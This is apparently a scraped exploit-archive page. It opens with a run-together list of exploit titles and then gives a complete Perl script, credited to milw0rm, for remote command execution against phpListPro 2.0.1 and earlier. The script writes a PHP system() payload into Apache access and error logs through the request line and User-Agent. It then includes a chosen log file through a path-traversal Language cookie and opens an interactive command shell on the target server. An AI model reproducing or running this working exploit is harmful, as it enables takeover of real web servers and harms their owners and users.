
5 new exploits phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerability Exploit phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerabilities My Book World Edition NAS Multiple Vulnerability My Book World Edition NAS - Multiple Vulnerabilities Katalog Stron Hurricane 1.3.5 - Multiple Vulnerability RFI / SQL Katalog Stron Hurricane 1.3.5 - (RFI / SQL) Multiple Vulnerabilities cmsfaethon-2.2.0-ultimate.7z Multiple Vulnerability cmsfaethon-2.2.0-ultimate.7z - Multiple Vulnerabilities DynPG CMS 4.1.0 - Multiple Vulnerability (popup.php and counter.php) DynPG CMS 4.1.0 - (popup.php and counter.php) Multiple Vulnerabilities Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerability Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities N/X - Web CMS (N/X WCMS 4.5) Multiple Vulnerability N/X - Web CMS (N/X WCMS 4.5) - Multiple Vulnerabilities New-CMS - Multiple Vulnerability New-CMS - Multiple Vulnerabilities Edgephp Clickbank Affiliate Marketplace Script Multiple Vulnerability Edgephp Clickbank Affiliate Marketplace Script - Multiple Vulnerabilities JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerability JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerabilities i-Gallery - Multiple Vulnerability i-Gallery - Multiple Vulnerabilities My Kazaam Notes Management System Multiple Vulnerability My Kazaam Notes Management System - Multiple Vulnerabilities Omnidocs - Multiple Vulnerability Omnidocs - Multiple Vulnerabilities Web Cookbook Multiple Vulnerability Web Cookbook - Multiple Vulnerabilities KikChat - (LFI/RCE) Multiple Vulnerability KikChat - (LFI/RCE) Multiple Vulnerabilities Webformatique Reservation Manager - 'index.php' Cross-Site Scripting Vulnerability Webformatique Reservation Manager 2.4 - 'index.php' Cross-Site Scripting Vulnerability xEpan 1.0.4 - Multiple Vulnerability xEpan 1.0.4 - Multiple Vulnerabilities AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow Cisco UCS Manager 2.1(1b) - Shellshock Exploit OpenSSH <= 7.2p1 - xauth Injection FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow
103 lines
2.8 KiB
Perl
Executable file
103 lines
2.8 KiB
Perl
Executable file
#!/usr/bin/perl
|
|
#
|
|
# Title: phpListPro <= 2.0.1 Remote Command Execution Exploit
|
|
# URL: http://www.smartisoft.com/
|
|
#
|
|
# Info:
|
|
# - arbitrary local inclusion
|
|
# - need magic_quotes_gpc=off
|
|
#
|
|
#
|
|
|
|
use IO::Socket;
|
|
use LWP::Simple;
|
|
|
|
#ripped from rgod
|
|
|
|
@apache=(
|
|
"/var/log/httpd/access_log%00",
|
|
"/var/log/httpd/error_log%00",
|
|
"/var/log/apache/error.log%00",
|
|
"/var/log/apache/access.log%00",
|
|
"/apache/logs/error.log%00",
|
|
"/apache/logs/access.log%00",
|
|
"/etc/httpd/logs/acces_log%00",
|
|
"/etc/httpd/logs/acces.log%00",
|
|
"/etc/httpd/logs/error_log%00",
|
|
"/etc/httpd/logs/error.log%00",
|
|
"/var/www/logs/access_log%00",
|
|
"/var/www/logs/access.log%00",
|
|
"/usr/local/apache/logs/access_log%00",
|
|
"/usr/local/apache/logs/access.log%00",
|
|
"/var/log/apache/access_log%00",
|
|
"/var/log/apache/access.log%00",
|
|
"/var/log/access_log%00",
|
|
"/var/www/logs/error_log%00",
|
|
"/www/logs/error.log%00",
|
|
"/usr/local/apache/logs/error_log%00",
|
|
"/usr/local/apache/logs/error.log%00",
|
|
"/var/log/apache/error_log%00",
|
|
"/var/log/apache/error.log%00",
|
|
"/var/log/access_log%00",
|
|
"/var/log/error_log%00",
|
|
);
|
|
|
|
print "[i] phpListPro remote command execution exploit\n";
|
|
print "[i] Need magic_quotes_gpc=off\n";
|
|
print "[i] Coded by [Oo]\n\n";
|
|
|
|
|
|
if (@ARGV < 3)
|
|
{
|
|
print "[*] Usage: phplistpro_exp.pl [host] [path] [apache_path]\n\n";
|
|
print "[*] Apache_Path: \n";
|
|
$i = 0;
|
|
while($apache[$i])
|
|
{
|
|
print "[$i] $apache[$i]\n";
|
|
$i++;
|
|
}
|
|
print "\n[*] Exemple: phplistpro_exp.pl 127.0.0.1 /phplistpro/ 1\n";
|
|
exit();
|
|
}
|
|
|
|
$serv=$ARGV[0];
|
|
$path=$ARGV[1];
|
|
$type=$ARGV[2];
|
|
|
|
print "[+] Injecting some code in log files...\n";
|
|
#ripped from rgod
|
|
$CODE="<?php ob_clean();system(\$HTTP_COOKIE_VARS[cmd]);die;?>";
|
|
$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$serv", PeerPort=>"80") or die "[-] Connecting ... Could not connect to host.\n\n";
|
|
print $socket "GET ".$path.$CODE." HTTP/1.1\r\n";
|
|
print $socket "User-Agent: ".$CODE."\r\n";
|
|
print $socket "Host: ".$serv."\r\n";
|
|
print $socket "Connection: close\r\n\r\n";
|
|
close($socket);
|
|
|
|
print "[+] Ok! Now here the shell, type exit to quit\n";
|
|
print "[+] If it's not work maybe try another apache_path...\n\n";
|
|
|
|
print "[shell] ";
|
|
$cmd = <STDIN>;
|
|
|
|
while($cmd !~ "exit")
|
|
{
|
|
$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$serv", PeerPort=>"80") or die "[-] Connecting ... Could not connect to host.\n\n";
|
|
|
|
print $socket "GET ".$path."config.php HTTP/1.1\r\n";
|
|
print $socket "Host: ".$serv."\r\n";
|
|
print $socket "Accept: */*\r\n";
|
|
print $socket "Cookie: Language=/../../../../../../../../../..".$apache[$type].";cmd=$cmd \r\n";
|
|
print $socket "Connection: close\r\n\n";
|
|
|
|
while ($answer = <$socket>)
|
|
{
|
|
print $answer;
|
|
}
|
|
|
|
print "[shell] ";
|
|
$cmd = <STDIN>;
|
|
}
|
|
|
|
# milw0rm.com [2006-05-19]
|